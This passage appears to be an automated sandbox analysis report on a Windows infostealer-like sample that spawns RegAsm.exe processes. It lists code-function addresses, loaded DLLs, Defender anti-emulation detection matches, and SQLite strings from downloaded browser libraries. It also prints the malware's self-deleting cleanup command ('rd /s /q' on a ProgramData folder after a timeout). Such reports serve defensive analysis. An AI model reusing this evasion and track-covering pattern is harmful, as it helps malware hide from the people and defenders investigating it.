                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7177A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70F070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6EC0E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7350C7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6F60A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73B170
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C705190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70E2F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C22A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6DC370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C5340
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C70D320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7353C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6CF380
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AC60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C836C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C84AC30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76ECC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C806D90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8FCDC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8F8D20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C774DB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C89AD50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C83ED70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C810EC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C850E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C77AEC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7F6E90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C80EE70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B8FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7DEF40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C776F10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C84EFF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C770FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8B0F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C77EFB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C832F70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7C0820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FA820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8768E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C844840
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7A8960
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8009A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C82A9A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8309B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C88C9E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7C6900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7A49F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7ECA70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81EA00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C828A30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7EEA80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C810BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C876BE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C778BAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C89A480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C788460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FA430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80A4D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7D4420
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7B64D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7D2560
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7C8540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83A5E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FE5F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7645B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C874540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8B8550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C810570
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7CC650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80E6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7CE6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7946D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F0700
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C79A7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7BE070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C84C0B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83C000
                  Source: C:\Users\user\Desktop\file.exe Code function: String function: 006E7D60 appears 53 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C793620 appears 44 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8F09D0 appears 173 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C799B10 appears 37 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004024D7 appears 312 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C7094D0 appears 90 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8FDAE0 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004180A8 appears 104 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8FD930 appears 33 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C6FCBE8 appears 134 times
                  Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                  Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@11/25@1/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C727030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6860:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_03
                  Source: C:\Users\user\Desktop\file.exe Command line argument: .o
                  Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini
                  Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2047601334.000000006C8FF000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqlx[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                  Source: RegAsm.exe, 00000003.00000002.2043950908.0000000019258000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2040755834.00000000132E9000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.3.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                  Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                  Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                  Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                  Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rstrtmgr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: propsys.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.fileexplorer.common.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ntshrui.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: linkinfo.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dlnashext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wpdshext.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: edputil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appresolver.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: bcp47langs.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: slc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sppc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: pcacli.dll
                  Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
